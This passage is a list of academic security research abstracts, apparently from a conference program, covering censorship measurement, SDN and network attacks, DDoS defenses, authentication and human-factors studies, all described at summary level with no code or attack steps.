Our findings suggest that data centers block differently from the residential ISPs both in quantity and in method of blocking, resulting in different experiences of the Internet for residential network perspectives and data center perspectives. As expected, residential vantage points experience high levels of censorship. While we observe a range of blocking techniques, such as TCP/IP blocking, DNS manipulation, or keyword based filtering, we find that residential ISPs are more likely to inject blockpages with explicit notices to users when censorship is enforced. Russia’s censorship architecture is a blueprint, and perhaps a forewarning of what and how national censorship policies could be implemented in many other countries that have similarly diverse ISP ecosystems to Russia’s. Understanding decentralized control will be key to continuing to preserve Internet freedom for years to come.

Measuring the Deployment of Network Censorship Filters at Global Scale

Content filtering technologies are often used for Internet censorship, but even as these technologies have become cheaper and easier to deploy, the censorship measurement community lacks a systematic approach to monitor their proliferation. Past research has focused on a handful of specific filtering technologies, each of which required cumbersome manual detective work to identify. Researchers and policymakers require a more comprehensive picture of the state and evolution of censorship based on content filtering in order to establish effective policies that protect Internet freedom.

In this work, we present FilterMap, a novel framework that can scalably monitor content filtering technologies based on their blockpages. FilterMap first compiles in-network and new remote censorship measurement techniques to gather blockpages from filter deployments. We then show how the observed blockpages can be clustered, generating signatures for longitudinal tracking. FilterMap outputs a map of regions of address space in which the same blockpages appear (corresponding to filter deployments), and each unique blockpage is manually verified to avoid false positives.

By collecting and analyzing more than 379 million measurements from 45,000 vantage points against more than 18,000 sensitive test domains, we are able to identify filter deployments associated with 90 vendors and actors and observe filtering in 103 countries. We detect the use of commercial filtering technologies for censorship in 36 out of 48 countries labeled as ‘Not Free’ or ‘Partly Free’ by the Freedom House ‘’Freedom on the Net’’ report. The unrestricted transfer of content filtering technologies have led to high availability, low cost, and highly effective filtering techniques becoming easier to deploy and harder to circumvent. Identifying these filtering deployments highlights policy and corporate social responsibility issues, and adds accountability to filter manufacturers. Our continued publication of FilterMap data will help the international community track the scope, scale and evolution of content-based censorship.

SymTCP: Eluding Stateful Deep Packet Inspection with Automated Discrepancy Discovery

A key characteristic of commonly deployed deep packet inspection (DPI) systems is that they implement a simpli- fied state machine of the network stack that often differs from that of the end hosts. The discrepancies between the two state machines have been exploited to bypass such DPI middleboxes. However, most prior approaches to do so rely on manually crafted adversarial packets, which not only is labor-intensive but may not work well across a plurality of DPI-based middleboxes. Our goal in this work is to develop an automated way to craft such candidate packets, targeting TCP implementations in particular. Our approach to achieve this goal hinges on the key insight that while the TCP state machines of DPI implementations are obscure, those of the end hosts are well established. Thus, in our system SYMTCP, using symbolic execution, we systematically explore the TCP implementation of an end host, identifying candidate packets that can reach critical points in the code (e.g., which causes the packets to be accepted or dropped/ignored); such automatically identified packets are then fed through the DPI middlebox to determine if a discrepancy is induced and the middlebox can be bypassed. We find that our approach is extremely effective. It can generate tens of thousands of candidate adversarial packets in less than an hour. When evaluating against multiple state-of-the-art DPI middleboxes such as Zeek and Snort, as well as a state-level censorship firewall, Great Firewall of China, we identify not only previously known evasion strategies, but also novel ones that were never previously reported (e.g., involving urgent pointer). The system can extend easily to test other combinations of operating systems and DPI middleboxes, and serve as a valuable testing tool of future DPIs’ robustness against evasion attempts.

MassBrowser: Unblocking the Censored Web for the Masses, by the Masses

Existing censorship circumvention systems fail to offer reliable circumvention without sacrificing their users’ QoS and privacy, or undertaking high costs of operation. We have designed and implemented a censorship circumvention system, called SwarmProxy (anonymized name), whose goal is to offer emph{effective censorship circumvention} to a large body of censored users, with emph{high QoS}, emph{low costs of operation}, and emph{adjustable privacy protection}. Towards this, we have made several key decisions in designing our system. First, we argue that circumvention systems should not bundle strong privacy protections (like anonymity) with censorship circumvention. Additional privacy properties should be offered as optional features to the users of circumvention users, which can be enabled by specific users or on specific connections (perhaps by trading off QoS). Second, we combine various state-of-the-art circumvention techniques (such as using censored clients to proxy circumvention traffic for other censored clients, using volunteer NATed proxies, and leveraging CDN hosting) to make SwarmProxy significantly resistant to blocking, while keeping its cost of operation small ($0.001 per censored client per month).

We have built and deployed SwarmProxy as a fully operational system with end-user GUI software for major operating systems. Our system has been in beta release for over a year with hundreds of users from major censoring countries testing it on a daily basis. A key part of SwarmProxy’s design is using non-censored Internet users to run volunteer proxies to help censored users. We have performed the first user study on the willingness of typical Internet users in helping circumvention operators. We have used the findings of our user study in the design of SwarmProxy to encourage wide adoption by volunteers; particularly, our GUI software offers high transparency, control, and safety to the volunteers.

Session 4A: Future Networks

When Match Fields Do Not Need to Match: Buffered Packets Hijacking in SDN

Software-Defined Networking (SDN) greatly meets the need in industry for programmable, agile, and dynamic networks by deploying diversified SDN applications on a centralized controller. However, SDN application ecosystem inevitably introduces new security threats since compromised or malicious applications can significantly disrupt network operations. A number of effective security enhancement systems have been developed to defend against potential attacks from SDN applications, including data provenance systems to protect applications from being poisoned by malicious applications, rule conflict detection systems to prevent data packets from bypassing network security policies, and application isolation systems to prevent applications from corrupting controllers. In this paper, we identify a new design flaw on flow rule installation in SDN, and this vulnerability can be exploited by malicious applications to launch effective attacks bypassing existing defense systems. We discover that SDN systems do not check the inconsistency between the buffer ID and match fields when an application attempts to install flow rules, so that a malicious application can manipulate the buffer ID to hijack buffered packets even though the installed flow rule from the application does not match the packet with that buffer ID. We name this new vulnerability as buffered packet hijacking, which can be exploited to launch attacks that disrupt all three SDN layers, namely, application layer, data plane layer, and control layer. First, by modifying buffered packets and resending them to controllers, a malicious application can poison other applications. Second, by manipulating forwarding behaviors of buffered packets, a malicious application can not only disrupt TCP connections of flows but also make flows bypass network security policies. Third, by copying massive buffered packets to controllers, a malicious application can saturate the bandwidth of the SDN control channel and computing resources. We demonstrate the feasibility and effectiveness of these attacks with both theoretical analysis and experiments in a real SDN testbed. Finally, we develop a lightweight defense system that can be readily deployed in existing SDN controllers as a patch.

Automated Discovery of Cross-Plane Event-Based Vulnerabilities in Software-Defined Networking

Software-defined networking (SDN) achieves a programmable control plane through the use of logically centralized, event-driven controllers and through network applications (apps) that extend the controllers’ functionality. As control plane decisions are often based on the data plane, it is possible for carefully-crafted malicious data plane inputs to direct the control plane towards unwanted states that bypass network security restrictions (i.e., cross-plane attacks). Unfortunately, due to the complex interplay between controllers, apps, and data plane inputs, at present it is difficult to systematically identify and analyze these cross-plane vulnerabilities.

We present EventScope, a vulnerability detection tool that automatically analyzes SDN control plane event usage, discovers candidate vulnerabilities based on missing event handling routines, and validates vulnerabilities based on data plane effects. To accurately detect missing event handlers without ground truth or developer aid, we cluster apps according to similar event usage and mark inconsistencies as candidates. We create an event flow graph to observe a global view of events and control flows within the control plane and use it to validate vulnerabilities that affect the data plane. We applied EventScope to the ONOS SDN controller and uncovered 14 new vulnerabilities.

SVLAN: Secure & Scalable Network Virtualization

Network isolation is a critical modern Internet service. To date, network operators have created a logical network of distributed systems to provide communication isolation between different parties. However, the current network isolation is limited in scalability and flexibility. It limits the number of virtual networks and it only supports isolation at host (or virtual-machine) granularity. In this paper, we introduce Scalable Virtual Local Area Networking (SVLAN) that scales to a large number of distributed systems and offers improved flexibility in providing secure network isolation. With the notion of destination-driven reachability and packet-carrying forwarding state, SVLAN not only offers communication isolation but isolation can be specified at different granularities, e.g., per-application or per-process. Our proof-of-concept SVLAN implementation demonstrates its feasibility and practicality for real-world applications.

Session 5A: Network Crime and Privacy

A Practical Approach for Taking Down Avalanche Botnets Under Real-World Constraints

In 2016, law enforcement dismantled the infrastructure of the Avalanche bulletproof hosting service, the largest takedown of a cybercrime operation so far. The malware families supported by Avalanche use Domain Generation Algorithms (DGAs) to generate random domain names for controlling their botnets. The takedown proactively targets these presumably malicious domains; however, as coincidental collisions with legitimate domains are possible, investigators must first classify domains to prevent undesirable harm to website owners and botnet victims.

The constraints of this real-world takedown (proactive decisions without access to malware activity, no bulk patterns and no active connections to domains) mean that approaches from the state of the art cannot be applied. The problem of classifying thousands of registered DGA domain names therefore required an extensive, painstaking manual effort by law enforcement investigators. To significantly reduce this effort without compromising correctness, we develop a model that automates the classification. We achieve an accuracy of 95.8% on the ground truth of the 2017 Avalanche takedown, which translates into a reduction of up to 94.0% in manual investigation effort. Furthermore, we interpret the model to provide investigators with insights into how benign and malicious domains differ in behavior, which features and data sources are most important, and how the model can be configured according to the practical requirements of a real-world takedown.

Designing a Better Browser for Tor with BLAST

Tor is an anonymity network that allows clients to browse web pages privately, but loading web pages with Tor is slow. To analyze how the browser loads web pages, we examine their resource trees using our new browser logging and simulation tool, BLAST. We find that the time it takes to load a web page with Tor is almost entirely determined by the number of round trips incurred, not its bandwidth, and Tor Browser incurs unnecessary round trips. Resources sit in the browser queue excessively waiting for the TCP, TLS or ALPN handshakes, each of which takes a separate round trip. We show that increasing resource loading capacity with larger pipelines and even HTTP/2 do not decrease load time because they do not save round trips.

We set out to minimize round trips with a number of protocol and browser improvements,
including TCP Fast Open, optimistic data, zero-RTT TLS. We also recommend the use of databases to assist the client with redirection, identifying HTTP/2 servers, and prefetching. All of these features are designed to cut down on the number of round trips incurred in loading web pages. To evaluate these proposed improvements, we create a simulation tool and validate that it is highly accurate in predicting mean page load times. We use the simulator to analyze these features and it predicts that they will decrease the mean page load time by 61% in total over HTTP/2. Our large improvement to user experience comes at trivial cost to the Tor network.

Encrypted DNS –> Privacy? A Traffic Analysis Perspective

Virtually every connection to an Internet service is preceded by a DNS lookup which is performed without any traffic-level protection, thus enabling manipulation, redirection, surveillance, and censorship. To address these issues, large organizations such as Google and Cloudflare are deploying recently standardized protocols that encrypt DNS traffic between end users and recursive resolvers such as DNS-over-TLS (DoT) and DNS-over-HTTPS (DoH). In this paper, we examine whether encrypting DNS traffic can protect users from traffic analysis-based monitoring and censoring. We propose a novel feature set to perform the attacks, as those used to attack HTTPS or Tor traffic are not suitable for DNS’ characteristics. We show that traffic analysis enables the identification of domains with high accuracy in closed and open world settings, using 124 times less data than attacks on HTTPS flows. We find that factors such as location, resolver, platform, or client do mitigate the attacks performance but they are far from completely stopping them. Our results indicate that DNS-based censorship is still possible on encrypted DNS traffic. In fact, we demonstrate that the standardized padding schemes are not effective. Yet, Tor — which does not effectively mitigate traffic analysis attacks on web traffic— is a good defense against DoH traffic analysis.

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways

Typical port scanning approaches do not achieve a full coverage of all devices connected to the Internet as not all devices are directly reachable via a public (IPv4) address: due to IP address space exhaustion, firewalls, and many other reasons, an end-to-end connectivity is not achieved in today’s Internet anymore. Especially Network Address Translation (NAT) is widely deployed in practice and it has the side effect of “hiding” devices from being scanned. Some protocols, however, require end-to-end connectivity to function properly and hence several methods were developed in the past to enable crossing network borders.

In this paper, we explore how an attacker can take advantage of such application-layer middlebox protocols to access devices hidden behind these gateways. More specifically, we investigate different methods for identifying such devices by (ab)using legitimate protocol features. We categorize the available protocols into two classes: First, there are persistent protocols that are typically port forwarding based. Such protocols are used to allow local network devices to open and forward external ports to them. Second, there are non-persistent protocols that are typically proxy-based to route packets between network edges, such as HTTP and SOCKS proxies. We perform a comprehensive, Internet-wide analysis to obtain an accurate overview of how prevalent and widespread such protocols are in practice. Our results indicate that hundreds of thousands of hosts are vulnerable for different types of attacks, e. g., we detect over 400.000 hosts that are likely vulnerable for attacks involving the UPnP IGD protocol. More worrisome, we find empirical evidence that attackers are already actively exploiting such protocols in the wild to access devices located behind NAT gateways. Amongst other findings, we discover that at least 24 % of all open Internet proxies are misconfigured to allow accessing hosts on non-routable addresses.

Session 6A: Network Defenses

Hold the Door! Fingerprinting Your Car Key to Prevent Keyless Entry Car Theft

Recently, the traditional way to unlock car doors has been replaced with a keyless entry system which proves more convenient for automobile owners. When a driver with a key fob is in vicinity of the vehicle, doors automatically unlock on user command. However, unfortunately, it has been known that these keyless entry systems are vulnerable to signal-relaying attacks. While it is evident that automobile manufacturers incorporate preventative methods to secure these keyless entry systems, a range of attacks continue to occur. Relayed signals fit into the valid packets that are verified as legitimate, and this makes it is difficult to distinguish a legitimate request for doors to be unlocked from malicious signals. In response to this vulnerability, this paper presents an RF-fingerprinting method (coined “HOld the DOoR”, HODOR) to detect attacks on keyless entry systems, which is the first attempt to exploit RF-fingerprint technique in automotive domain. HODOR is designed as a sub-authentication system that supports existing authentication systems for keyless entry systems and does not require any modification of the main system to perform. Through a series of experiments, the results demonstrate that HODOR competently and reliably detects attacks on keyless entry systems. HODOR achieves both an average false positive rate (FPR) of 0.27% with a false negative rate (FNR) of 0% for the detection of simulated attacks corresponding to the current issue on keyless entry car theft. Furthermore, HODOR was also observed under environmental factors: temperature variation, non-line-of-sight (NLoS) conditions and battery aging. HODOR yields a false positive rate of 1.32% for the identification of a legitimated key fob which is even under NLoS condition. Based on the experimental results, it is expected that HODOR will provide a secure service for keyless entry systems, while remaining convenient.

Poseidon: Mitigating Volumetric DDoS Attacks with Programmable Switches

Distributed Denial-of-Service (DDoS) attacks have become a critical threat to the Internet. Due to the increasing number of vulnerable Internet of Things (IoT) devices, attackers can easily compromise a large set of nodes to form botnets and launch high-volume DDoS attacks. State-of-the-art DDoS defenses, however, have not caught up with the fast evolution of the attacks and the requirements of latency-sensitive services in data centers, as most existing defense systems are high in cost and low in agility. In this paper, we propose POSEIDON, a framework that is designed to address those key limitations in today’s DDoS defenses, leveraging emerging programmable switches that can be reconfigured in the field without additional hardware cost. In designing POSEIDON, we address three key challenges in terms of intent expression, resource orchestration, and runtime management. Evaluations using our prototype demonstrate that POSEIDON can potentially defend against ∼Tbps attack traffic, simplify the defense intent expression within tens of lines of code, accommodate to policy changes in seconds, and adapt to dynamic attacks with negligible overheads. Moreover, compared with the state of the art, POSEIDON reduces the defense costs and the end-to-end packet processing latency by two orders of magnitude, making it a promising defense against modern advanced DDoS attacks.

EASI: Edge-Based Sender Identification on Resource-Constrained Platforms for Automotive Networks

In vehicles, internal Electronic Control Units (ECUs) are increasingly prone to adversarial exploitation over wireless connections due to ongoing digitalization. Controlling an ECU allows an adversary to send messages to the internal vehicle bus and thereby to control various vehicle functions. Access to the Controller Area Network (CAN), the most widely used bus technology, is especially severe as it controls brakes and steering. However, state of the art receivers are not able to identify the sender of a frame. Retrofitting frame authenticity, e.g. through Message Authentication Codes (MACs), is only possible to a limited extent due to reduced bandwidth, low payload and limited computational resources. To address this problem, observation in analog differences of the CAN signal was proposed to determine the actual sender. These prior approaches, which exhibit good identification rates in some cases, require high sample rates and a high computational effort. With EASI we significantly reduce the required resources and at the same time show increased identification rates of 99.98% by having no false positives in a prototype structure and two series production vehicles. In comparison to the most lightweight approach so far, we have reduced the memory footprint and the computational requirements by a factor of 168 and 142, respectively. In addition, we show the feasibility of EASI and thus for the first time that sender identification is realizable using comprehensive signal characteristics on resource-constrained platforms. Due to the lightweight design, we achieved a classification in under 100,$mu$s with a training time of 2.61 seconds. We also showed the ability to adapt the system to incremental changes during operation. Since cost effectiveness is of utmost importance in the automotive industry due to high production volumes, the achieved improvements are significant and necessary to realize sender identification.

BLAG: Improving the Accuracy of Blacklists

IP address blacklists are a useful source of information about repeat attackers. Such information can be used to prioritize which traffic to divert for deeper inspection (e.g., repeat offender traffic), or which traffic to serve first (e.g., traffic from sources that are not blacklisted). But blacklists also suffer from overspecialization – each list is geared towards a specific purpose – and they may be inaccurate due to misclassification or stale information. We propose BLAG, a system that evaluates and aggregates multiple blacklists feeds, producing a more useful, accurate and timely master blacklist, tailored to the specific customer network. BLAG uses a sample of the legitimate sources of the customer network’s inbound traffic to evaluate the accuracy of each blacklist over regions of address space. It then leverages recommendation systems to select the most accurate information to aggregate into its master blacklist. Finally, BLAG identifies portions of the master blacklist that can be expanded into larger address regions (e.g. /24 prefixes) to uncover more malicious addresses with minimum collateral damage. Our evaluation of 157 blacklists of various attack types and three ground-truth datasets shows that BLAG achieves high specificity up to 99%, improves recall by up to 114 times compared to competing approaches, and detects attacks up to 13.7 days faster, which makes it a promising approach for blacklist generation.

DefRec: Establishing Physical Function Virtualization to Disrupt Reconnaissance of Power Grids’ Cyber-Physical Infrastructures

Reconnaissance is critical for adversaries to prepare attacks causing physical damage in industrial control systems (ICS) like smart power grids. Disrupting the reconnaissance is challenging. The state-of-the-art moving target defense (MTD) techniques based on mimicking and simulating system behaviors do not consider the physical infrastructure of power grids and can be easily identified.

To overcome those challenges, we propose physical function virtualization (PFV) that hooks’’ network interactions with real physical devices and uses them to build lightweight virtual nodes following the actual implementation of network stacks, system invariants, and physical state variations of real devices. On top of PFV, we propose DefRec, a defense mechanism that significantly increases the reconnaissance efforts for adversaries to obtain the knowledge of power grids’ cyber-physical infrastructures. By randomizing communications and crafting decoy data for the virtual physical nodes, DefRec can mislead adversaries into designing damage-free attacks. We implement PFV and DefRec in the ONOS network operating system and evaluate them in a cyber-physical testbed, which uses real devices from different vendors and HP physical switches to simulate six power grids. The experiment results show that with negligible overhead, PFV can accurately follow the behavior of real devices. DefRec can significantly delay passive attacks for at least five months and isolate proactive attacks with less than $10^{-30}$ false negatives.

Session 7A: Network Attacks

Withdrawing the BGP Re-Routing Curtain: Understanding the Security Impact of BGP Poisoning through Real-World Measurements

The security of the Internet’s routing infrastructure has underpinned much of the past two decades of distributed systems security research. However, the converse is increasingly true. Routing and path decisions are now important for the security properties of systems built on top of the Internet. In particular, BGP poisoning leverages the de facto routing protocol between Autonomous Systems (ASes) to maneuver the return paths of upstream networks onto previously unusable, new paths. These new paths can be used to avoid congestion, censors, geo-political boundaries, or any feature of the topology which can be expressed at an AS-level. Given the increase in use of BGP poisoning as a security primitive for security systems, we set out to evaluate the feasibility of poisoning in practice, going beyond simulation.

To that end, using a multi-country and multi-router Internet-scale measurement infrastructure, we capture and analyze over 1,400 instances of BGP poisoning across thousands of ASes as a mechanism to maneuver return paths of traffic. We analyze in detail the performance of steering paths, the graph-theoretic aspects of available paths, and re-evaluate simulated systems with this data. We find that the real-world evidence does not completely support the findings from simulated systems published in the literature. We also analyze filtering of BGP poisoning across types of ASes and ISP working groups. We explore the connectivity concerns when poisoning by reproducing a decade old experiment to uncover the current state of an Internet triple the size. We build predictive models for understanding an ASes vulnerability to poisoning. Finally, an exhaustive measurement of an upper bound on the maximum path length of the Internet is presented, detailing how recent and future security research should react to ASes leveraging poisoning with long paths. In total, our results and analysis attempt to expose the real-world impact of BGP poisoning on past and future security research.

IMP4GT: IMPersonation Attacks in 4G NeTworks

Long Term Evolution (LTE/4G) establishes mutual authentication with a provably secure Authentication and Key Agreement protocol on layer three of the network stack. Permanent integrity protection of the control plane safeguards the traffic against manipulations. However, missing integrity protection of the user plane still allows an adversary to manipulate and redirect IP packets, as recently demonstrated.

In this work, we introduce a novel cross-layer attack that exploits the existing vulnerability on layer two and extends it with an attack mechanism on layer three. More precisely, we take advantage of the default IP stack behavior of operating systems, which allows an active attacker to impersonate a user towards the network and vice versa; we name these attacks IMP4GT (IMPersonation attacks in 4G neTworks). In contrast to a simple redirection attack as demonstrated in prior work, our attack dramatically extends the possible attack scenarios and thus emphasizes the need for user plane integrity protection in mobile communication standards. The results of our work imply that providers can no longer rely on mutual authentication for billing, access control, and legal prosecution. On the other side, users are exposed to any incoming IP connection as an adversary can bypass the provider’s firewall. To demonstrate the practical impact of our attack, we conduct two IMP4GT attack variants in a commercial network, which—for the first time—completely break the mutual authentication aim of LTE on the user plane in a real-world setting.

Practical Traffic Analysis Attacks on Secure Messaging Applications

Instant Messaging (IM) applications like Telegram, Signal, and WhatsApp have become extremely popular in recent years. Unfortunately, such IM services have been the target of continuous governmental surveillance and censorship, as these services are home to public and private communication channels on socially and politically sensitive topics. To protect their clients, popular IM services deploy state-of-the-art encryption mechanisms. In this paper, we show that despite the use of advanced encryption, popular IM applications leak sensitive information about their clients to adversaries who merely monitor their encrypted IM traffic, with no need for leveraging any software vulnerabilities of IM applications. Specifically, we devise traffic analysis attacks that enable an adversary to identify administrators as well as members of target IM channels (e.g., forums) with high accuracies. We believe that our study demonstrates a significant, real-world threat to the users of such services given the increasing attempts by oppressive governments at cracking down controversial IM channels.

We demonstrate the practicality of our traffic analysis attacks through extensive experiments on real-world IM communications. We show that standard countermeasure techniques such as adding cover traffic can degrade the effectiveness of the attacks we introduce in this paper. We hope that our study urges IM providers to integrate effective traffic obfuscation countermeasures into their software. In the meantime, we have designed and deployed an open-source, publicly available countermeasure system, called IMProxy, that can be used by IM clients with no need for any support from IM providers. We have demonstrated the effectiveness of IMProxy through experiments.

CDN Judo: Breaking the CDN DoS Protection with Itself

Content Delivery Network (CDN) improves the websites’ accessing performance and availability with its globally distributed network infrastructures, which contributes to the flourish of CDN-powered websites on the Internet. As CDN-powered websites are normally operating important businesses or critical services, the attackers are mostly interested to take down these high-value websites, achieving severe damage with maximum influence. As the CDN absorbs distributed attacking traffic with its massive bandwidth resources, CDN vendors have always claimed that they provide effective DoS protection for the CDN-powered websites.

However, we reveal that, implementation or protocol weaknesses in the CDN’s forwarding mechanism can be exploited to break the CDN protection. By sending crafted but legal requests, an attacker can launch an efficient DoS attack against the website Origin behind.
In particular, we present three CDN threats in this study.
Through abusing the CDN’s HTTP/2 request converting behavior and HTTP pre-POST behavior, an attacker can saturate the CDN-Origin bandwidth and exhaust the Origin’s connection limits.
What is more concerning is that, some CDN vendors only use a small set of traffic forwarding IPs with lower IP-churning ratio to establish connections with the Origin. This characteristic provides a great opportunity for an attacker to effectively degrade the website’s global availability, by just cutting off specific CDN-Origin connections.

In this work, we examine the CDN’s request-forwarding behaviors across six well-known CDN vendors, and we perform real-world experiments to evaluate the severity of the threats. As the threats are caused by the CDN vendor’s poor trade-offs between usability and security, we discuss the possible mitigations, and we receive positive feedback after responsible disclosure to related CDN vendors.

Session 9B: Authentication

OcuLock: Exploring Human Visual System for Authentication in Virtual Reality Head-mounted Display

The increasing popularity of virtual reality (VR) in a wide spectrum of applications has generated sensitive personal data such as medical records and credit card information. While protecting such data from unauthorized access is critical, directly applying traditional authentication methods (e.g., PIN) through new VR input modalities such as remote controllers and head navigation would cause security issues. The authentication action can be purposefully observed by attackers to infer the authentication input. Unlike any other mobile devices, VR presents immersive experience via a head-mounted display (HMD) that fully covers users’ eye area without public exposure. Leveraging this feature, we explore human visual system (HVS) as a novel biometric authentication tailored for VR platforms. While previous works used eye globe movement (gaze) to authenticate smartphones or PCs, they suffer from a high error rate and low stability since eye gaze is highly dependent on cognitive states. In this paper, we explore the HVS as a whole to consider not just the eye globe movement but also the eyelid, extraocular muscles, cells, and surrounding nerves in the HVS. Exploring HVS biostructure and unique HVS features triggered by immersive VR content can enhance authentication stability. To this end, we present OcuLock, an HVS-based system for reliable and unobservable VR HMD authentication. OcuLock is empowered by an electrooculography (EOG) based HVS sensing framework and a record-comparison driven authentication scheme. Experiments through 70 subjects show that OcuLock is resistant against common types of attacks such as impersonation attack and statistical attack with Equal Error Rates as low as 3.55% and 4.97% respectively. More importantly, OcuLock maintains a stable performance over a 2-month period and is preferred by users when compared to other potential approaches.

On the Resilience of Biometric Authentication Systems against Random Inputs

We assess the security of machine learning based biometric authentication systems against an attacker who submits uniform random inputs, either as feature vectors or raw inputs, in order to find an emph{accepting sample} of a target user. The average false positive rate (FPR) of the system, i.e., the rate at which an impostor is incorrectly accepted as the legitimate user, may be interpreted as a measure of the success probability of such an attack. However, we show that the success rate is often higher than the FPR. In particular, for one reconstructed biometric system with an average FPR of 0.03, the success rate was as high as 0.78. This has implications for the security of the system, as an attacker with only the knowledge of the length of the feature space can impersonate the user with less than 2 attempts on average. We provide detailed analysis of why the attack is successful, and validate our results using four different biometric modalities and four different machine learning classifiers. Finally, we propose mitigation techniques that render such attacks ineffective, with little to no effect on the accuracy of the system.

Strong Authentication without Temper-Resistant Hardware and Application to Federated Identities

Shared credential is currently the most widespread form of end user authentication with its convenience, but it is also criticized for being vulnerable to credential database theft and phishing attacks. While several alternative mechanisms are proposed to offer strong authentication with cryptographic challenge-response protocols, they are cumbersome to use due to the need of tamper-resistant hardware modules at user end. In this paper, we propose the first strong authentication mechanism without the reliance on tamper-resistant hardware at user end. A user authenticates with a password-based credential via generating designated-verifiable authentication tokens. Our scheme is resistant to offline dictionary attacks in spite that the attacker can steal the password-protected credentials, and thus can be implemented for general-purpose device.
More specifically, we first introduce and formalize the notion of Password-Based Credential (PBC), which models the resistance of offline attacks and the unforageability of authentication tokens even if attackers can see authentication tokens and capture password-wrapped credentials of honest users. We then present a highly-efficient construction of PBC using a “randomize-then-prove” approach, and prove its security. The construction doesn’t involve bilinear-pairings, and can be implemented with common cryptographic libraries for many platforms. We also present a technique to transform the PBC scheme to be publicly-verifiable, and present an application of PBC in federated identity systems to provide holder-of-key assertion mechanisms. Compared with current certificate-based approaches, it is more convenient and user-friendly, and can be used with the federation systems that employs privacy-preserving measures (e.g., Sign-in with Apple). We also implement the PBC scheme and evaluate its performance for different applications over various network environment. When PBC is used as a strong authentication mechanism for end users, it saves 26%-36% of time than the approach based on ECDSA with a tamper-resistant hardware module. As for its application in federation, it could even save more time when the user proves its possession of key to a Relying Party.

Session 10A: Case Studies & Human Factors

A View from the Cockpit: Exploring Pilot Reactions to Attacks on Avionic Systems

Many wireless communications systems found in aircraft lack standard security mechanisms, leaving them fundamentally vulnerable to attack. With affordable software-defined radios available, a novel threat has emerged, allowing a wide range of attackers to easily interfere with wireless avionic systems. Whilst these vulnerabilities are known, concrete attacks that exploit them are still novel and not yet well understood. This is true in particular with regards to their kinetic impact on the handling of the attacked aircraft and consequently its safety. To investigate this, we invited 30 Airbus A320 type-rated pilots to fly simulator scenarios in which they were subjected to attacks on their avionics. We implement and analyze novel wireless attacks on three safety-related systems: Traffic Collision Avoidance System (TCAS), Ground Proximity Warning System (GPWS) and the Instrument Landing System (ILS). We found that all three analyzed attack scenarios created significant control impact and cost of disruption through turnarounds, avoidance manoeuvres, and diversions. They further increased workload, distrust in the affected system, and in 38% of cases caused the attacked safety system to be switched off entirely. All pilots felt the scenarios were useful, with 93.3% feeling that specific simulator training for wireless attacks could be valuable.

Genotype Extraction and False Relative Attacks: Security Risks to Third-Party Genetic Genealogy Services Beyond Identity Inference

Here, we evaluate the security of a consumer-facing, third party genetic analysis service, called GEDmatch, that specializes in genetic genealogy: a field that uses genetic data to identify relatives. GEDmatch is one of the most prominent third-party genetic genealogy services due to its size (over 1 million genetic data files) and the large role it now plays in criminal investigations. In this work, we focus on security risks particular to genetic genealogy, namely relative matching queries – the algorithms used to identify genetic relatives – and the resulting relative predictions. We experimentally demonstrate that GEDmatch is vulnerable to a number of attacks by an adversary that only uploads normally formatted genetic data files and runs relative matching queries. Using a small number of specifically designed files and queries, an attacker can extract a large percentage of the genetic markers from other users; 92% of markers can be extracted with 98% accuracy, including hundreds of medically sensitive markers. We also find that an adversary can construct genetic data files that falsely appear like relatives to other samples in the database; in certain situations, these false relatives can be used to make the de-identification of genetic data more difficult. These vulnerabilities exist because of particular design choices meant to improve functionality. However, our results show how security and the goals of genetic genealogy can come in conflict. We conclude with a discussion of the broader impact of these results to the entire consumer genetic testing community and provide recommendations for genetic genealogy services.

Complex Security Policy? A Longitudinal Analysis of Deployed Content Security Policies

The Content Security Policy (CSP) mechanism was developed as a mitigation against script injection attacks in 2010. In this paper, we leverage the unique vantage point of the Internet Archive to conduct a historical and longitudinal analysis of how CSP deployment has evolved for a set of 10,000 highly ranked domains. In doing so, we document the long-term struggle site operators face when trying to roll out CSP for content restriction and highlight that even seemingly secure whitelists can be bypassed through expired or typo domains. Next to these new insights, we also shed light on the usage of CSP for other use cases, in particular, TLS enforcement and framing control. Here, we find that CSP can be easily deployed to fit those security scenarios, but both lack wide-spread adoption. Specifically, while the underspecified and thus inconsistently implemented X-Frame-Options header is increasingly used on the Web, CSP’s well-specified and secure alternative cannot keep up. To understand the reasons behind this, we run a notification campaign and subsequent survey, concluding that operators have often experienced the complexity of CSP (and given up), utterly unaware of the easy-to-deploy components of CSP. Hence, we find the complexity of secure, yet functional content restriction gives CSP a bad reputation, resulting in operators not leveraging its potential to secure a site against the non-original attack vectors.

Into the Deep Web: Understanding E-commerce Fraud from Autonomous Chat with Cybercriminals

E-commerce miscreants heavily rely on instant messaging (IM) to promote their illicit businesses and coordinate their operations. The threat intelligence provided by IM communication, therefore, becomes invaluable for understanding and mitigating the threats of e-commerce frauds. However, such information is hard to get since it is usually shared only through one-on-one conversations with the criminals. In this paper, we present the first chatbot, called Aubrey, to actively collect such intelligence through autonomous chats with real-world e-commerce miscreants. Our approach leverages the question-driven conversation pattern of small-time workers, who seek from e-commerce fraudsters jobs and/or attack resources, to model the interaction process as a finite state machine, thereby enabling an autonomous conversation. Aubrey successfully chatted with 470 real-world e-commerce miscreants and gathered a large amount of fraud-related artifact, including 40 SIM gateways, 323K fraud phone numbers, and previously-unknown attack toolkits, etc. Further, the conversations reveal the supply chain of e-commerce fraudulent activities on the deep web and the complicated relations (e.g., complicity and reselling) among miscreant roles.

Compliance Cautions: Investigating Security Issues Associated with U.S. Digital-Security Standards

Digital security compliance programs and policies serve as powerful tools for protecting organizations’ intellectual property, sensitive resources, customers, and employees through mandated security controls. Organizations place a significant emphasis on compliance and often conflate high compliance audit scores with strong security; however, no compliance standard has been systemically evaluated for security concerns that may exist even within fully-compliant organizations. In this study, we describe our approach for auditing three exemplar compliance standards that affect nearly every person within the United States: standards for federal tax information, credit card transactions, and the electric grid. We partner with organizations that use these standards to validate our findings within enterprise environments and provide first-hand narratives describing impact.

We find that when compliance standards are used literally as checklists — a common occurrence, as confirmed by compliance experts — their technical controls and processes are not always sufficient. Security concerns can exist even with perfect compliance. We identified 148 issues of varying severity across three standards; our expert partners assessed 49 of these issues and validated that 36 were present in their own environments and 10 could plausibly occur elsewhere. We also discovered that no clearly-defined process exists for reporting security concerns associated with compliance standards; we report on our varying levels of success in responsibly disclosing our findings and influencing revisions to the affected standards. Overall, our results suggest that auditing compliance standards can provide valuable benefits to the security posture of compliant organizations.

0%